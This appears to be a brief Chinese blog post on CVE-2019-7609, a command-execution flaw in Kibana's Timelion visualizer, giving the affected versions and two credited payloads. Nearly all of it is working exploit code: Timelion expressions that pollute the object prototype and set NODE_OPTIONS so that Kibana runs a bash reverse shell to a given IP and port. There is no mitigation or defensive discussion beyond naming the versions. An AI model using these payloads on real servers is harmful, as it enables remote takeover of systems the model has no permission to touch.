# CVE-2019-7609 Kibana Timelion visualizer命令执行
Ver: 5.6.15 版本以及 6.6.1 版本以前
– payload by [@securityMB](https://twitter.com/securityMB)
“`javascript
.es(*).props(label.__proto__.env.AAAA=’require(“child_process”).exec(“bash -i >& /dev/tcp/192.168.0.136/12345 0>&1”);process.exit()//’)
.props(label.__proto__.env.NODE_OPTIONS=’–require /proc/self/environ’)
“`
– payload by [@chybeta](https://twitter.com/chybeta)
“`javascript
.es(*).props(label.__proto__.env.AAAA=’require(“child_process”).exec(“bash -c \’bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'”);//’)
.props(label.__proto__.env.NODE_OPTIONS=’–require /proc/self/environ’)
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容